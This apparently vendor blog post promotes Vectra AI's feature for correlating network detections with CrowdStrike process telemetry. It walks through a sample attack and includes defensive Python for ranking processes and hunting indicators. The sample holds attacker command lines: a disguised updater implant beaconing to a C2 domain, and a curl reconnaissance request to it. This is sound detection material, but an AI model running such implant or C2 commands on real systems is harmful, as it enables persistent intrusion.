Stop hunting for the "what" — see it instantly
When suspicious activity appears, the first question every analyst asks is: What caused this?
Without the answer, investigations stall. Analysts pivot between consoles, search through endpoint telemetry, correlate timestamps, and piece together context manually. Minutes turn into hours. Meanwhile, attackers move laterally, exfiltrate data, or establish persistence.
This is the gap between network detection and endpoint understanding — and it's where threats gain their advantage.
The Missing Link Between Network and Endpoint
Network Detection and Response (NDR) excels at spotting suspicious behaviors: command-and-control, reconnaissance, lateral movement, data exfiltration. But network telemetry alone can't tell you which process on the endpoint initiated that behavior.
Was it a legitimate browser session? A PowerShell script? A hidden malware executable?
Endpoint Detection and Response (EDR) captures that process-level detail, but without correlation to network activity, analysts must manually bridge the gap — searching CrowdStrike for processes around the same timeframe, hoping to identify the culprit.
This manual correlation is slow, error-prone, and unsustainable at scale.
Introducing EDR Automatic Process Correlation
Vectra AI's newest capability, EDR Process Correlation, eliminates this investigative friction entirely and enriches every network detection with endpoint process context.

Here's how it works:
When Vectra AI identifies suspicious network behavior, it automatically queries CrowdStrike telemetry for that specific host, analyzes the process activity, and identifies the most probable process that triggered the detection.
The result? Instant, automatic answers.
Analysts see the complete process context directly within the Vectra AI detection:
Probable Process: MicrosoftEdgeUpdate.exe
Process Creation Time: 2025-11-29T03:58:42Z
Command Line: "C:\ProgramData\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" --connect vault-tech.org:443 --interval 300 --retry infinite
SHA256: c7e9a4b2f8d6c5e3a1f7d9b4c2e8a6f5d3b1c9e7a5f3d1b8c6e4a2f9d7b5c3e1
File Path: \Device\HarddiskVolume2\ProgramData\Microsoft\EdgeUpdate\
Account Name: NT AUTHORITY\SYSTEM
Parent Process: services.exe (PID: 668)
In seconds, the analyst has the full story:
- What executed: A disguised persistence mechanism mimicking Microsoft Edge's updater
- When it ran: Exact process creation timestamp for timeline correlation
- What it did: Command line exposes C2 domain (vault-tech.org), 5-minute beacon interval, and infinite retry attempts
- Where it lives: Hidden in a legitimate-looking Microsoft folder path
- Who ran it: SYSTEM account - maximum privileges for persistence and lateral movement
- What spawned it: A services.exe parent indicates this malware registered itself as a Windows service
- Threat intelligence: SHA256 hash ready for immediate reputation checks and threat feed correlation
At first glance, this looks like routine Microsoft software. But the command line tells the real story - it's a persistent C2 beacon with SYSTEM privileges, checking in every 5 minutes, disguised as a legitimate updater.
That command line alone converts "potentially suspicious network traffic" into "confirmed persistent threat requiring immediate containment." That's investigative gold, delivered automatically.
Plus, a one-click pivot to CrowdStrike takes analysts directly to the full process tree and forensic timeline when deeper investigation is needed.
No manual searches. No console switching. No guesswork.
From Hours to Seconds: Real Impact for SOC Teams
Before EDR Process Correlation:
- Analyst receives Vectra AI network detection
- Identifies the affected host
- Opens CrowdStrike console
- Searches for processes around the detection timeframe
- Correlates network timestamps with process activity
- Validates which process is responsible
- Average time: 15-30 minutes per detection
With EDR Process Correlation:
- Analyst receives Vectra AI detection with process already identified
- Reviews enriched context inline
- Clicks directly into CrowdStrike if deeper investigation needed
- Average time: 30-60 seconds
That's a 95% reduction in investigation time — and it compounds across every detection, every day.
Beyond Single Processes: From Detection to Enterprise-Wide Hunt
EDR Process Correlation doesn't just identify the probable process - it provides a complete investigation workflow from initial triage to enterprise-wide threat hunting.
Immediate Context: Show More Processes
With one click on Show More Processes, analysts see all process activity during the detection window. In this example, reviewing the process list reveals the full attack progression:
- msedge.exe - Initial access via phishing click
- curl.exe - Reconnaissance: curl.exe -I https://vault-tech.org --connect-timeout 5
  The attacker validates C2 reachability before committing to persistence - a HEAD request with a connection timeout indicates cautious operational security
- certutil.exe - SSL validation to verify C2 infrastructure
  Rather than the typical abuse for file downloads, here certutil verifies the C2's certificate chain, ensuring the encrypted tunnel won't trigger SSL warnings or trust errors that might alert users or security tools
- MicrosoftEdgeUpdate.exe - Persistent C2 tunnel with 5-minute beacons
  Only after confirming infrastructure reachability and SSL validity does the attacker establish the beaconing implant with 5-minute intervals
Deeper Host Investigation: One-Click CrowdStrike Pivot
From the same interface, Investigate Host in CrowdStrike opens directly into the full host timeline within Falcon. Analysts can instantly extend the timeframe to see processes before or after the detection window - no manual host lookups, no agent ID (AID) searches, just immediate access to complete host context.
This is invaluable for understanding the full scope: Was there reconnaissance days earlier? Did the attacker return with different tools? The timeline is right there.
Enterprise-Wide Hunting: Pre-Built Threat Intelligence Query
The real power emerges with Run Query in CrowdStrike, which generates a sophisticated Falcon NGSIEM query pre-populated with all the relevant indicators:
- Remote IP addresses
- SHA256 hashes
- Command line patterns
- Process execution characteristics
- Network connection details
This query would take a very experienced analyst 10-15 minutes to construct manually. Vectra AI delivers it instantly, ready to run across your entire environment.
Example use case: The query is scoped to this host by default, but with one modification - removing the host filter - analysts can immediately hunt for:
- Any other endpoints connecting to vault-tech.org
- Any other systems running the same malicious hash
- Similar command line patterns indicating related campaigns
This transforms a single-host detection into enterprise-wide threat intelligence in seconds.
This is particularly powerful when NDR detects activity that EDR didn't flag. The attacker successfully blended in at the process level, but the network behavior exposed them. EDR Process Correlation bridges that gap instantly, showing not just what happened, but the complete progression of the attack.
Built for Real-World Investigations
Using intelligent timestamp correlation and probabilistic process matching, Vectra AI EDR Process Correlation handles the complexity of modern endpoints automatically:
- Multi-process environments: Identifies the right process even when dozens are running simultaneously
- Child process chains: Enables tracing activity back through parent-child relationships
- Short-lived processes: Captures context even for processes that execute and terminate quickly
- Encrypted traffic: Correlates network behavior with processes even when payload inspection isn't possible
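The correlation step described under "Here's how it works", the timestamp-based process matching just listed, and the indicator set behind Run Query in CrowdStrike can be sketched in code. The following Python is an added illustrative example, not Vectra AI's or CrowdStrike's code, and it does not claim to reproduce their algorithm: the record shapes, the 30-minute lookback window, the scoring weights, the host names, the placeholder hashes and every process event are constructed assumptions (only the implant's command line and its SHA256 are taken from the example above). It scores each process on the detection's host by how recently it started before the traffic and by whether its command line names the remote host, which is why the implant outranks svchost.exe even though svchost.exe started later; it then reduces the winner to a hunt indicator set and runs that set over other hosts' telemetry, the "remove the host filter" step.

```python
"""Detection-to-process correlation and hunt-indicator extraction. Added illustrative example, not
Vectra AI's or CrowdStrike's code: record shapes, window, weights and sample events are constructed."""
import re
import shlex
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class NetworkDetection:      # the NDR side: host the traffic was attributed to, when, and to where
    host: str
    observed_at: datetime
    remote_host: str         # destination domain or IP seen on the wire

@dataclass(frozen=True)
class ProcessEvent:          # the EDR side (a subset of the fields shown in the write-up)
    host: str
    name: str
    pid: int
    parent: str
    created_at: datetime
    command_line: str
    sha256: str

LOOKBACK = timedelta(minutes=30)   # assumed: how far before the detection a process may have started
CLOCK_SKEW = timedelta(seconds=5)  # assumed: tolerated NDR/EDR clock difference
MENTION_BONUS = 2.0                # assumed: weight when the command line names the remote host

def score_process(det, proc):
    """Relevance score for one process, or None if it cannot explain the detection."""
    if proc.host != det.host:
        return None
    age = det.observed_at - proc.created_at
    if age < -CLOCK_SKEW or age > LOOKBACK:
        return None                                    # started after the traffic, or too long before it
    recency = 1.0 - max(age, timedelta(0)) / LOOKBACK  # 1.0 at detection time, 0.0 at the window edge
    mention = MENTION_BONUS if det.remote_host.lower() in proc.command_line.lower() else 0.0
    return recency + mention

def rank_processes(det, events):
    """Eligible processes on the detection's host, most probable first, as (score, event) pairs."""
    scored = [(s, p) for p in events if (s := score_process(det, p)) is not None]
    return sorted(scored, key=lambda sp: sp[0], reverse=True)

def network_endpoints(cmd):
    """host:port values a command line names: URLs, host:port tokens and IPv4 addresses."""
    found = set()
    for tok in (t.strip('"') for t in shlex.split(cmd, posix=False)):
        m = re.match(r"^(https?://)?([A-Za-z0-9.-]+)(?::(\d{1,5}))?(?:/.*)?$", tok)
        if m and (m[1] or m[3] or re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", m[2])):  # else a bare word
            default = {"https://": "443", "http://": "80"}.get(m[1], "any")
            found.add(f"{m[2]}:{m[3] or default}")
    return found

def command_line_pattern(cmd):
    """Image name plus flag names with values stripped, e.g. 'curl.exe -I --connect-timeout'."""
    tokens = [t.strip('"') for t in shlex.split(cmd, posix=False)]
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    return " ".join([image, *(t.lower() for t in tokens[1:] if t.startswith(("-", "/")))])

def hunt_indicators(proc):
    """Indicator set an enterprise-wide query would carry for the probable process."""
    return {"sha256": proc.sha256,
            "remote_endpoints": sorted(network_endpoints(proc.command_line)),
            "command_line_pattern": command_line_pattern(proc.command_line)}

def hunt_fleet(ind, events):
    """Hosts whose telemetry shares any indicator: the 'remove the host filter' hunt."""
    hits = {}
    for p in events:
        checks = {"sha256": p.sha256 == ind["sha256"],
                  "remote_endpoint": bool(network_endpoints(p.command_line) & set(ind["remote_endpoints"])),
                  "command_line_pattern": command_line_pattern(p.command_line) == ind["command_line_pattern"]}
        if any(checks.values()):
            hits.setdefault(p.host, set()).update(k for k, v in checks.items() if v)
    return hits

def ts(s):  # constructed UTC timestamps
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

MALWARE_SHA = "c7e9a4b2f8d6c5e3a1f7d9b4c2e8a6f5d3b1c9e7a5f3d1b8c6e4a2f9d7b5c3e1"  # hash from the write-up
IMPLANT_ARGS = " --connect vault-tech.org:443 --interval 300 --retry infinite"   # from the write-up
EVENTS = [  # constructed telemetry modelled on the write-up's process list; other hashes are placeholders
    ProcessEvent("WS-0042", "msedge.exe", 4120, "explorer.exe", ts("2025-11-29T03:41:07Z"),
                 r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://invoice-portal.example/view', "sha-msedge"),
    ProcessEvent("WS-0042", "curl.exe", 5208, "cmd.exe", ts("2025-11-29T03:52:10Z"),
                 "curl.exe -I https://vault-tech.org --connect-timeout 5", "sha-curl"),
    ProcessEvent("WS-0042", "MicrosoftEdgeUpdate.exe", 7744, "services.exe", ts("2025-11-29T03:58:42Z"),
                 r'"C:\ProgramData\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"' + IMPLANT_ARGS, MALWARE_SHA),
    ProcessEvent("WS-0042", "svchost.exe", 7802, "services.exe", ts("2025-11-29T03:59:10Z"),   # newest, but unrelated
                 "svchost.exe -k netsvcs", "sha-svchost"),
    ProcessEvent("WS-0174", "MicrosoftEdgeUpdate.exe", 3310, "services.exe", ts("2025-11-29T02:14:05Z"),   # same implant elsewhere
                 r'"C:\Users\Public\Libraries\MicrosoftEdgeUpdate.exe"' + IMPLANT_ARGS, MALWARE_SHA),
    ProcessEvent("WS-0201", "MicrosoftEdgeUpdate.exe", 2216, "services.exe", ts("2025-11-29T03:00:00Z"),   # shares only the name
                 r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc', "sha-updater"),
]
DETECTION = NetworkDetection("WS-0042", ts("2025-11-29T04:03:45Z"), "vault-tech.org")  # beacon one interval later
```

`rank_processes(DETECTION, EVENTS)` returns the implant first, curl.exe second (it names the C2 domain but is older), svchost.exe third, and excludes the other hosts; `hunt_fleet(hunt_indicators(...), EVENTS)` then flags WS-0042 and WS-0174 by hash, remote endpoint and command-line pattern, while WS-0201, whose updater invocation shares only the image name, is not flagged. The endpoint extractor deliberately treats only URLs, host:port tokens and IPv4 addresses as endpoints, so flag values such as 300 or infinite never become indicators. A ranking like this is a triage aid: the runner-up list is the equivalent of the Show More Processes view, and an analyst still confirms the winner before acting.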
This intelligence powers faster, more confident decisions across your entire security workflow.
Complete Visibility, Unified Response
EDR Process Correlation is part of Vectra AI's comprehensive integration with CrowdStrike, delivering end-to-end threat clarity:
- Asset Contextualization — CrowdStrike-managed endpoints are automatically identified in Vectra AI with OS, sensor ID, and last-seen details
- EDR Process Correlation — Process telemetry is automatically correlated with network detections
- Automated Response — Vectra AI can trigger host containment actions through CrowdStrike's API
Together, these capabilities create a unified defense that sees the complete attack story — from initial process execution to network propagation — without manual intervention.
Why This Matters Now
Attackers increasingly blend endpoint techniques with network movement to evade detection. Malware dropped on an endpoint doesn't stay there — it beacons to C2 servers, moves laterally, and exfiltrates data across the network.
Your defenses must move just as fluidly.
By automatically connecting endpoint process context to network detections, Vectra AI and CrowdStrike expose the full attack chain instantly. Analysts get complete cross-domain visibility from the first alert — no pivoting, no delay, no blind spots.
See EDR Process Correlation in Action
Watch how Vectra AI automatically identifies the initiating process for network detections and enables one-click investigation in CrowdStrike.
Ready to accelerate your threat investigations?
Learn more about Vectra AI's integration with CrowdStrike and how EDR Process Correlation delivers instant context for faster, more confident response.